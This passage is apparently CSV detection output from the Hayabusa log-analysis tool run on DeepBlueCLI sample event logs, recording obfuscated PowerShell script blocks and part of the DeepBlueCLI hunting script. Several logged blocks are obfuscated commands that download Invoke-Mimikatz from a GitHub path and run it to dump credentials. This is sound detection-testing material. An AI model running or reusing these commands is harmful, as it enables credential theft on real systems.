)",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:05.642 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"(('&( 0V6PsHome[4]+0V6pshOME[34]+ITGXITG) ((((a3t{64}{90}{3}{91}{14}{40}{67}{6}{37}{36}{22}{87}{60}{1'+'0}{35}{57}{43}{44}{41}{7}{19}{50}{68}{12}{0}{'+'31}{85}{88}{72}{25}{63}{32}{5}{'+'39}{46}{65}{26}{42}{30}{77}{76}{15}{73}{75}{82}{86}{4}{70}{51}{47}{13}{56}{89}{66}{83}{49}{1}{34}{27}{7'+'9}{20}{11}{5'+'9}{45}{17}{24}{84}{33'+'}{21}{48}{71}{18}{23}{16}{28}{29}{80}{'+'74}{2}{38}{81}{54}{62}{78}{69}{52}{61}{53}{9}{58}{55'+'}{8}a3t -fITGrITG,ITGtiyJaITG,ITGJaITG,ITGa*mDR*yJa).nAmEITG,'+'ITGit/maITG,'+'ITGtyJITG,ITGIEX (NewITG,ITGient)ITG,ITG)) ITG,ITGCredsyJaITG,ITGaITG,ITG-MITG,ITGdStITG,ITGJITG,ITG3,11ITG,ITGJITG,ITGnvyJaITG,ITGt'+'ITG,ITGyJa0ITG,ITG.DITG,'+'ITGkeyJa+yJaITG,ITGyJa+y'+'J'+'ITG,ITG-ObyJa+ITG,ITG}); IITG,ITGyJaI'+'TG,ITGyJatps://yJaITG,ITGaercontent.comITG,ITGyJITG,ITG+ITG,ITGyJaoke-yJa+ITG,ITGmaITG,ITGiITG,ITGgiITG,ITGzITG,ITG+ITG,ITG+ITG,ITGJaITG,ITGyJa+yITG,ITGmyJaITG,ITGa+yJahubITG,ITG,2]-jOiN'+'yJayJITG,ITGebClITG,ITG/ITG,ITGat NeITG,ITGt.WITG,ITGJa+yJaITG,ITGu'+'syJa+ITG,ITGtyITG,ITGa.ps1ITG,I'+'TGyJa+yJaaITG,I'+'TGowITG,ITGJasITG,ITGDu'+'myJ'+'a+yJaITG,'+'ITGyJaITG,ITGJaITG,ITGcHaR]39ITG,ITGa+y'+'Jaer/ITG,ITGyJITG,ITG) -f[ITG,ITGimikayIT'+'G,ITGecyJITG,ITGpyJa+ITG,ITGikatyI'+'TG,ITG+yJaraw.ITG,ITG.ITG,ITGyJITG,ITGxfilyJa+yJatyJa+ITG,ITGa)(((yJaITG,ITGnloaITG,ITGJaz -ITG,ITGyJa+yITG,ITG{yJa+ITG,ITG}htyJa+ITG,ITGa+y'+'JaatITG,ITGyJa+yITG,ITGion/ITG,ITGstyITG,ITGttifeITG,ITGJa+yITG,ITGaon/InvoITG,ITGyJaMiITG,ITG+yITG,ITGPoy'+'JaITG,ITGyJarITG,ITG+yJ'+'aITG,ITGng({ITG,ITG+yJawerSploITG,ITGyJajITG,ITG0ITG,ITGEITG,ITG((Gv yJITG,ITG'+'[IT'+'G)) -cRepLAce ([ChaR]'+'121+[ChaR]74+[ChaR]97),[ChaR]39)) ') -CrePlace ([chAR]73+[chAR]84+[chAR]71),[chAR]39 -REpLACe'a3t',[chAR]34 -REpLACe '0V6',[chAR]36) | InVOkE-ExpReSsIoN",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:25.754 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:43.056 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:43.075 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$DelimitedEncodedArray += ([String]([Int][Char]$_) + (Get-Random -Input $RandomDelimiters))},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:44.154 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:44.166 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:44.171 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:44.174 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:44.176 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:44.180 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:44.181 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:44.236 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([String]([Int][Char]$_) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:46.183 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:46.196 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:46.238 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:20:18.176 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:15.729 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:15.743 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.186 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.194 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.199 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.202 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.205 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.208 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.212 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.222 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.253 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.268 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:17.070 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:17.087 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:17.127 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:22.147 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".( $PsHOME[21]+$pShOMe[30]+'x')( "" $( SET-ITeM 'vAriabLE:OFs' '')"" +[sTRing]('26K28!20%24l65J4e:76&3ai43i6f!4di73K50%45J63J5b:34!2cl31l35%2c&32i35%5d&2d!4aK4fJ69i6e&27l27%29&20!28i5bl73:54l52%49i4eJ67l5d%3a%3ai4a%4f:49K6el28K20:27&27:2ci20:28!28l37%33J2ci20!36l39!20:2c&38:38K20!2c!33:32K2ci20l34!30K20i2c&37i38&2c%31!30!31l2c:31:31K39J2cK34!35&2cJ37i39&20l2c%20l39J38l2cJ31%30K36i20J2cK31K30:31%2c!39i39&2ci31l31l36&2cl20J33&32!2c:20%37:38!20%2c!31i30i31i20:2c:20:31%31:36K2ci34l36K20:2cl38l37l2cJ31J30K31:20i2cl39K38l2cJ36&37%2c:20!31!30%38l2ci31&30!35%20%2c:20%31&30%31l2c!20K31&31K30!20&2c!31:31%36i20&2c!34:31l20J2c!34%36:2cl20&36!38!2c!20%31%31:31l2c!20l31&31i39:20J2cJ31&31i30K20J2c&31!30!38i20K2cK31&31J31:2cK20K39J37%2ci20K31K30K30K2c&20K38&33l20:2cJ20i31l31J36!20K2ci31:31!34!2c%20&31J30%35&20:2c&31l31:30:2cK31:30l33&20J2cK34i30l20J2c&33l39K2c&20!31:30&34J2c%31l31l36&20i2c&31i31i36i2c!31l31:32i2c!20l31i31!35&20l2c%35J38!2c:20%34!37!2c&20K34K37:20K2cl20%31%31!34:2c&39J37:20l2cK20K31J31i39l2c&20&34J36:20i2cJ20!31:30&33&2cJ31l30i35J20%2c!20l31i31K36!2cJ20i31J30K34%20:2cl31K31%37J2cl20:39i38:20i2c%31l31:37!2c!31i31!35i2c%20!31J30!31l2c!31i31%34:20i2cJ20!39!39i2c&20J31K31!31:2cJ20l31K31l30K2c:31l31&36J20:2c:31l30K31&2c%31l31:30:20l2c%20!31J31!36l20!2c&20!34K36%2cK20i39:39K2cJ20K31!31i31!20:2c!20!31i30!39%2ci34i37!2cJ20K31:30i39!2c&39J37!20i2ci20&31K31J36l2cl31J31&36K20&2cK20i31l30K35K20i2cJ20%31l30J32i20J2c!31K30i31K2ci31%31%35l2ci20:31i31K36l2cJ20J39&37:20!2ci31l31J36l20J2c%20:31%30&35!20:2ci31&31i31!2cK20l31!31l30!2c!20i34J37J20:2cl20:38:30J2ci31%31!31K20K2c!31J31i39!2ci31&30i31K20!2ci20%31%31l34%20&2c&20J38&33:2c%20!31&31:32K2cK20&31:30:38i2ci20i31l31J31i2cl31l30l35l2c&20&31&31!36%2ci20&34J37%20:2cJ31K30:39J2cK20!39%37&2cK20:31:31&35&2cK20!31%31:36J20%2c!20i31K30K31i20!2c:31%31!34:20K2cl20&34&37i20J2c&20l36l39K20!2ci20J31!32J30K2c!31:30i32&2cJ20i31i30%35!20K2c!31K30l38:20l2c!31!31l36%20%2c!20i31K31&34%2c%20J39%37J2c!20%31l31&36:20%2cl20K31%30%35!2ci31:31i31:2c:31K31%30i20!2cK20i34%37i20!2c:37K33&20:2cJ31&31K30K2c:31!31%38l20%2c:20i31l31K31%2c%31K30&37:20:2c!20&31&30l31%20l2cl20:34J35%20:2c!37l37J20%2cl31%30&35:2c&31J30%39!2ci20i31:30J35i2c!20%31:30%37%20%2c%20!39K37!20i2c:31i31!36J20:2c&20i31K32J32%2c%20:34%36J2c!31:31i32%2cJ20!31l31&35i20l2cJ20:34:39i2c%20J33&39&20J2cl20i34l31&20:2cK20!35K39l2cJ33K32l20&2c%20!37l33K20:2cK20!31J31:30&20&2ci31:31%38:2c!31K31J31l20!2c!31&30i37!2c!20%31!30%31!20l2ci20&34l35K2cl37:37!2c!20:31i30J35:20&2c!31%30&39J2c%31%30:35&20:2c!20l31:30l37i20!2c:20J39%37%2cJ20:31%31%36K2ci20J31l32:32!2ci33!32!20l2c:34%35K2ci20l36%38l20J2cK20&31i31i37&20&2c!20J31i30:39l2cJ20%31:31i32l2c&36K37i2cl31!31l34l20%2c:31:30&31l2cl31i30&30%20!2c:31l31!35i20:29l7c!66%4f&52l45%61J43l68!2dl4f%62K6aK65:63i74%20:7b!20%28:5bJ49!6e:74i5d!24i5f%20i2di61:53%5bK43K48%41%52&5d:29%20&7d!29J20J29J20!29&20'.split('&K%:Ji!l' )|fOReAcH {( [cONveRt]::tOinT16( ( $_.tOstriNg()),16) -aS [cHar]) }) +""$(SeT-itEM 'VARiable:oFS' ' ') "" )",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:22.154 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{( [cONveRt]::tOinT16( ( $_.tOstriNg()),16) -aS [cHar]) }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:22.178 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"&( $eNv:CoMsPEc[4,15,25]-JOin'') ([sTRINg]::JOIn( '', ((73, 69 ,88 ,32, 40 ,78,101,119,45,79 , 98,106 ,101,99,116, 32, 78 ,101 , 116,46 ,87,101 ,98,67, 108,105 , 101, 110 ,116 ,41 ,46, 68, 111, 119 ,110 ,108 ,111, 97, 100, 83 , 116 ,114, 105 ,110,103 ,40 ,39, 104,116 ,116,112, 115 ,58, 47, 47 , 114,97 , 119, 46 , 103,105 , 116, 104 ,117, 98 ,117,115, 101,114 , 99, 111, 110,116 ,101,110 , 116 , 46, 99, 111 , 109,47, 109,97 , 116,116 , 105 , 102 ,101,115, 116, 97 ,116 , 105 ,111, 110, 47 , 80,111 ,119,101 , 114 , 83, 112, 108, 111,105, 116, 47 ,109, 97, 115, 116 , 101 ,114 , 47 , 69 , 120,102, 105 ,108 ,116 , 114, 97, 116 , 105,111,110 , 47 ,73 ,110,118 , 111,107 , 101 , 45 ,77 ,105,109, 105, 107 , 97 ,116 , 122, 46,112, 115 , 49, 39 , 41 , 59,32 , 73 , 110 ,118,111 ,107, 101 , 45,77, 105 ,109,105 , 107 , 97, 116, 122,32 ,45, 68 , 117 , 109, 112,67,114 ,101,100 ,115 )|fOREaCh-Object { ([Int]$_ -aS[CHAR]) }) ) )",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:22.178 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ ([Int]$_ -aS[CHAR]) },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:37.530 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:37.536 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it 